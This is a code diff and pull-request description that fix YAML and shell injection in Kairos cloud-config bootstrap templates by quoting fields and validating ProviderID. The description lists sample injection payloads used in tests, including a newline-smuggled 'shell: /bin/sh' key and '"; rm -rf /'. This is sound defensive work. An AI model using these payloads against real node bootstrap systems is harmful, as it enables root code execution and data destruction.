-hostname: {{ .HostnamePrefix }}{{ "{{ trunc 4 .MachineID }}" }}
+hostname: {{ printf "%s{{ trunc 4 .MachineID }}" .HostnamePrefix | quote }}
 {{- end }}
 
 {{- if .Install }}
 install:
   auto: {{ .Install.Auto }}
-  device: "{{ .Install.Device }}"
+  device: {{ .Install.Device | quote }}
   reboot: {{ .Install.Reboot }}
 {{- end }}
 
 users:
-- name: {{ .UserName }}
-  passwd: {{ .UserPassword }}
+- name: {{ .UserName | quote }}
+  passwd: {{ .UserPassword | quote }}
   groups:
   {{- range .UserGroups }}
-    - {{ . }}
+    - {{ . | quote }}
   {{- end }}
   {{- if or .GitHubUser .SSHPublicKey }}
   ssh_authorized_keys:
   {{- if .GitHubUser }}
-    - github:{{ .GitHubUser }}
+    - {{ printf "github:%s" .GitHubUser | quote }}
   {{- end }}
   {{- if .SSHPublicKey }}
-    - {{ .SSHPublicKey }}
+    - {{ .SSHPublicKey | quote }}
   {{- end }}
   {{- end }}
 - name: capk
@@ -60,6 +60,7 @@ users:
 # Pass providerID at k3s startup so node registers with correct providerID (avoids k3s:// vs kubevirt:// mismatch)
 # Use both k3s.args (Kairos) and config file drop-in (k3s loads /etc/rancher/k3s/config.yaml.d/*.yaml on every start)
 # Add --tls-san for LB endpoint so management cluster can connect via LoadBalancer
+# ProviderID is regex-validated before render (see internal/bootstrap/validate.go).
 k3s:
   enabled: true
   {{- if or .ProviderID .ControlPlaneLBEndpoint }}
@@ -361,7 +362,7 @@ stages:
       dns:
         nameservers:
         {{- range .DNSServers }}
-          - {{ . }}
+          - {{ . | quote }}
         {{- end }}
         path: "/etc/resolv.conf"
     {{- end }}

--- a/internal/bootstrap/templates/k3s_kairos_cloud_config_capv.yaml.tmpl
+++ b/internal/bootstrap/templates/k3s_kairos_cloud_config_capv.yaml.tmpl
@@ -23,32 +23,32 @@ Template inputs (from Go):
 {{/* Hostname: prefer explicit name, else use hostname prefix with Kairos templating for machine ID */}}
 {{/* The {{ trunc 4 .MachineID }} is Kairos templating syntax, output literally */}}
 {{- if .Hostname }}
-hostname: {{ .Hostname }}
+hostname: {{ .Hostname | quote }}
 {{- else if .HostnamePrefix }}
-hostname: {{ .HostnamePrefix }}{{ "{{ trunc 4 .MachineID }}" }}
+hostname: {{ printf "%s{{ trunc 4 .MachineID }}" .HostnamePrefix | quote }}
 {{- end }}
 
 {{- if .Install }}
 install:
   auto: {{ .Install.Auto }}
-  device: "{{ .Install.Device }}"
+  device: {{ .Install.Device | quote }}
   reboot: {{ .Install.Reboot }}
 {{- end }}
 
 users:
-- name: {{ .UserName }}
-  passwd: {{ .UserPassword }}
+- name: {{ .UserName | quote }}
+  passwd: {{ .UserPassword | quote }}
   groups:
   {{- range .UserGroups }}
-    - {{ . }}
+    - {{ . | quote }}
   {{- end }}
   {{- if or .GitHubUser .SSHPublicKey }}
   ssh_authorized_keys:
   {{- if .GitHubUser }}
-    - github:{{ .GitHubUser }}
+    - {{ printf "github:%s" .GitHubUser | quote }}
   {{- end }}
   {{- if .SSHPublicKey }}
-    - {{ .SSHPublicKey }}
+    - {{ .SSHPublicKey | quote }}
   {{- end }}
   {{- end }}
 - name: capk
@@ -59,6 +59,7 @@ users:
 # Control-plane node configuration
 # Pass providerID at k3s startup so node registers with correct providerID (avoids k3s:// vs vsphere:// mismatch)
 # Use both k3s.args (Kairos) and config file drop-in (k3s loads /etc/rancher/k3s/config.yaml.d/*.yaml on every start)
+# ProviderID is regex-validated by validateTemplateData before rendering — see internal/bootstrap/validate.go.
 k3s:
   enabled: true
   {{- if .ProviderID }}
@@ -281,7 +282,7 @@ stages:
       dns:
         nameservers:
         {{- range .DNSServers }}
-          - {{ . }}
+          - {{ . | quote }}
         {{- end }}
         path: "/etc/resolv.conf"
     {{- end }}

--- a/internal/bootstrap/validate.go
+++ b/internal/bootstrap/validate.go
@@ -1,0 +1,133 @@
+/*
+Copyright 2024 The Kairos CAPI Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+implied. See the License for the specific language governing
+permissions and limitations under the License.
+*/
+
+package bootstrap
+
+import (
+	"errors"
+	"fmt"
+	"regexp"
+)
+
+// providerIDPattern restricts ProviderID to the shape every CAPI infrastructure
+// provider uses: `<scheme>://<opaque-path>`. The scheme is a Kubernetes-style
+// identifier (letter then letter/digit/`.`/`+`/`-`); the path allows only
+// alphanumerics, dot, dash, underscore, slash, colon — no shell metacharacters,
+// no quotes, no whitespace, no semicolons.
+//
+// ProviderID is NOT a free-form user-provided string. It is propagated by the
+// infrastructure provider (CAPV/CAPK/CAPD/...) onto the CAPI Machine spec, and
+// our bootstrap renderer interpolates it into a systemd `ExecStartPre=` shell
+// command:
+//
+//	kubectl patch node $(hostname) -p '{"spec":{"providerID":"<here>"}}'
+//
+// Any character that escapes the shell context here becomes remote code
+// execution as root on first boot. We validate at render time as a defensive
+// gate even though the infra provider is the originator.
+var providerIDPattern = regexp.MustCompile(`^[a-zA-Z][a-zA-Z0-9+.\-]*://[a-zA-Z0-9._/:\-]+$`)
+
+// ValidateProviderID returns nil if s is empty or matches providerIDPattern.
+// Empty is allowed because not every render path sets ProviderID (workers and
+// CAPV control planes during early reconcile both render with ProviderID="").
+//
+// On failure, callers should treat the error as a render-time validation
+// failure and surface it as a status condition on the KairosConfig rather
+// than retrying — a malformed ProviderID never becomes well-formed by retry.
+func ValidateProviderID(s string) error {
+	if s == "" {
+		return nil
+	}
+	if !providerIDPattern.MatchString(s) {
+		return fmt.Errorf("providerID %q does not match required pattern %q", s, providerIDPattern.String())
+	}
+	return nil
+}
+
+// validateTemplateData runs all render-time invariants on TemplateData. It is
+// called from RenderK0sCloudConfig and RenderK3sCloudConfig before Execute, so
+// bad inputs fail loudly with a clear message instead of producing broken
+// userdata that a node executes silently at boot.
+//
+// The single common rule across every string field below: no newlines, no
+// carriage returns, no NUL. Those characters would either (a) inject extra
+// keys into the rendered YAML, (b) break the YAML block-scalar / list-item
+// embedding of the value, or (c) escape the shell context for fields that
+// also appear inside file-content block scalars or systemd ExecStartPre
+// directives.
+func validateTemplateData(d *TemplateData) error {
+	var errs []error
+	if err := ValidateProviderID(d.ProviderID); err != nil {
+		errs = append(errs, err)
+	}
+	// Generic "no control characters" check for fields that are interpolated
+	// into either YAML scalars OR block-scalar/shell contexts. The list below
+	// is the union of every string field on TemplateData (excluding ProviderID
+	// which has its own strict pattern check above).
+	stringFields := []struct{ name, value string }{
+		{"hostname", d.Hostname},
+		{"hostnamePrefix", d.HostnamePrefix},
+		{"userName", d.UserName},
+		{"userPassword", d.UserPassword},
+		{"gitHubUser", d.GitHubUser},
+		{"sshPublicKey", d.SSHPublicKey},
+		{"workerToken", d.WorkerToken},
+		{"k3sServerURL", d.K3sServerURL},
+		{"k3sToken", d.K3sToken},
+		{"podCIDR", d.PodCIDR},
+		{"serviceCIDR", d.ServiceCIDR},
+		{"primaryIP", d.PrimaryIP},
+		{"machineName", d.MachineName},
+		{"clusterNS", d.ClusterNS},
+		{"controlPlaneLBServiceName", d.ControlPlaneLBServiceName},
+		{"controlPlaneLBServiceNamespace", d.ControlPlaneLBServiceNamespace},
+		{"controlPlaneLBEndpoint", d.ControlPlaneLBEndpoint},
+		{"managementKubeconfigToken", d.ManagementKubeconfigToken},
+		{"managementKubeconfigSecretName", d.ManagementKubeconfigSecretName},
+		{"managementKubeconfigSecretNamespace", d.ManagementKubeconfigSecretNamespace},
+		{"managementAPIServer", d.ManagementAPIServer},
+	}
+	for _, f := range stringFields {
+		if err := rejectControlChars(f.name, f.value); err != nil {
+			errs = append(errs, err)
+		}
+	}
+	for i, g := range d.UserGroups {
+		if err := rejectControlChars(fmt.Sprintf("userGroups[%d]", i), g); err != nil {
+			errs = append(errs, err)
+		}
+	}
+	for i, dns := range d.DNSServers {
+		if err := rejectControlChars(fmt.Sprintf("dnsServers[%d]", i), dns); err != nil {
+			errs = append(errs, err)
+		}
+	}
+	return errors.Join(errs...)
+}
+
+// rejectControlChars returns an error if s contains any character that would
+// break the YAML or shell embed of s downstream: `\n`, `\r`, or NUL. Every
+// other byte is allowed — character-class validation is the webhook layer's
+// job, not the renderer's.
+func rejectControlChars(field, s string) error {
+	for i, r := range s {
+		switch r {
+		case '\n', '\r', 0x00:
+			return fmt.Errorf("%s: contains forbidden control character (byte 0x%02x at offset %d)", field, r, i)
+		}
+	}
+	return nil
+}


### PR DESCRIPTION
## Summary

The Kairos cloud-config bootstrap renderer was interpolating user-controlled `KairosConfig` spec fields raw into YAML. A `Hostname` containing `"foo\n  shell: /bin/sh"`, a `WorkerToken` containing YAML metacharacters, or a `ProviderID` containing shell metacharacters would inject keys into the rendered cloud-config that runs as root at first boot on every Kairos node. This is the KD-2 entry from the foundational code review.

This PR makes the renderer safe-by-construction along three axes.

### 1. Shared template FuncMap (`internal/bootstrap/funcs.go`)

Adds `quote` / `toYaml` / `safeIndent` / `nindent`. Every user-controlled scalar in the four `.tmpl` files now flows through `quote`, which delegates to `gopkg.in/yaml.v3` and produces the correct YAML quoting for each input shape — alphanumerics stay unquoted (existing tests unchanged), YAML-ambiguous values (`true`, `null`, `123`) emit double-quoted, values with metacharacters (`:`, `#`, …) emit appropriately quoted.

### 2. Render-time validation (`internal/bootstrap/validate.go`)

- `ValidateProviderID` enforces a strict regex `^[a-zA-Z][a-zA-Z0-9+.\-]*://[a-zA-Z0-9._/\-]+$` — the shape every CAPI infra provider uses. Defends the systemd `ExecStartPre` shell context where ProviderID is interpolated.
- `rejectControlChars` refuses any string field containing `\n`, `\r`, or NUL. These would break either the YAML embed of the value (block-scalar indent mismatch) or the shell embed of fields that also appear inside file-content block scalars.
- Failures are returned from `Render` with a clear error message, so callers (the bootstrap controller) can surface them as status conditions rather than silently emitting broken userdata.

### 3. Single `Render` entry point (`internal/bootstrap/template.go`)

The previous two `RenderK{0,3}sCloudConfig` functions each defined their own `FuncMap` — drift risk that the foundational review specifically flagged. Adding `quote` to one and forgetting the other would silently leave half the renders unsafe.

## Tests

221 cases pass. New coverage:

- `TestValidateProviderID_PositiveCases` — vsphere, kubevirt, docker, aws, gce, plus empty.
- `TestValidateProviderID_RejectsInjection` — `"; rm -rf /`, `$(…)`, backticks, newlines, semicolons, pipes, missing scheme, leading whitespace, NUL, BEL.
- `TestRender_RejectsBadProviderID` — `Render` itself refuses the injection payload (defense-in-depth).
- `TestRender_RejectsControlChars` — every string field surface (Hostname, UserPassword, WorkerToken, UserGroups, DNSServers) rejects `\n` / `\r` / NUL / CRLF / YAML doc separator.
- `TestRender_AdversarialHostname` / `UserPassword` / `UserGroups` / `DNSServers` — 17 YAML-metachar payloads each (colon, hash, flow mapping, shell metas, bool-y, int-y, null-y, leading hash/dash, tab, single quote, anchor, alias, unicode). Each test parses the rendered YAML and asserts the field round-trips to the original input.
- `TestSafeIndent_CRLF` — indent helper strips `\r` so Windows-authored `Manifest.Content` doesn't leak CR into block scalars.

One existing test updated (`device: "auto"` → `device: auto`) because yaml.v3 correctly elides quotes for alphanumeric values. The semantic invariant is preserved.

## Scope notes

- **In scope**: YAML-context escaping for every user-controlled field across all 4 templates; ProviderID strict validation at render time; control-char rejection for all string fields.
- **Deferred** (separate PR): shell-context escaping for fields that *also* appear inside file-content block scalars / shell scripts (e.g. `Manifest.Name` in `mkdir -p`, `PrimaryIP` in `KAIROS_PRIMARY_IP="…"`). These need either a shell-quote template func or stricter per-field validation (RFC1123 labels, IP regex, etc.). The control-char rejection here is a partial mitigation; the remaining work is tracked.

## Verification

```
go vet ./...        # clean
go build ./...      # clean
go test -short ./... # all green (221 bootstrap cases pass)
```

Closes KD-2.
Refs KD-7 (ProviderID strict validator).